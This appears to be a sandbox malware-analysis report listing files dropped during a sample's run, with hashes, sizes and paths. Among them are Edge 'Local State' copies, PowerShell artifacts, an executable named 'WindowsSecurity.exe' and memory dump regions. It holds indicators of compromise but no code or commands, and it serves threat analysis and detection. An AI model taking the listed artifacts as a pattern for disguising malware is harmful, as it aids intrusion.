MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
99cbfbd27b85ba7e407ec91151ef3139

SHA1
ecee25a01568e164c63043a951511de5c13da39f

SHA256
f1bc0ac59700ccb140158a3df4e69eca478b32f614064d6e4ceab60406f99859

SHA512
73397f329e19160419c743d1ca7c8d2993860a8cdedf6ad044a8cdecfecaf011a0f513ee08e2a9d669724415c2da3f12e8724aabbd986116f033449bc84f17b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2d63cb1d2e1fff361f1dbb53133f2a55

SHA1
b825ee330d6c9039a213b50fcd15fd57133264fe

SHA256
6b105fb07bd9395f09284c02e61beef3281471ca8fc481a58b9f99eae0cf11c7

SHA512
82ce96007ed8b079e5693c8be10889fc238624e125270b84800effe0c6b04b974f22e8baef2a3c3ae4b252db67704f53c3582b8f78c859b711039fb6defff16e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rluz2w2a.fvi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\WindowsSecurity.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 848937.crdownload

Filesize
292KB

MD5
90322d8cf181af1b8cc55ecf5c7c7249

SHA1
5942e11669f5baeb6c68d82a693040c953ed6234

SHA256
89a94a2c249fbdb9131ed467c3c20f34abed79c8c5b6b95e98e6a5f00f035249

SHA512
82d0f8c70c620deff7c6f6bfc2b72008dc9b1f66c721523e79decb8a74247f72ac4c46d52637b5a017b91b33d8affe4a6cbd9f11337007a9f270e8c964c50fec

Download Submit
memory/5248-82-0x00000294B84D0000-0x00000294B84E8000-memory.dmp

Filesize
96KB

Download
memory/5248-81-0x00000294B8490000-0x00000294B84C8000-memory.dmp

Filesize
224KB

Download
memory/5248-171-0x00000294B8AC0000-0x00000294B8ACC000-memory.dmp

Filesize
48KB

Download
memory/5248-80-0x00000294B8480000-0x00000294B8488000-memory.dmp

Filesize
32KB

Download
memory/5248-70-0x00000294B8250000-0x00000294B8272000-memory.dmp

Filesize
136KB

Download
memory/5248-240-0x00000294B8620000-0x00000294B862E000-memory.dmp

Filesize
56KB

Download
memory/5752-224-0x000002AF37F10000-0x000002AF37F54000-memory.dmp

Filesize
272KB

Download
memory/5752-225-0x000002AF381E0000-0x000002AF38256000-memory.dmp

Filesize
472KB

Download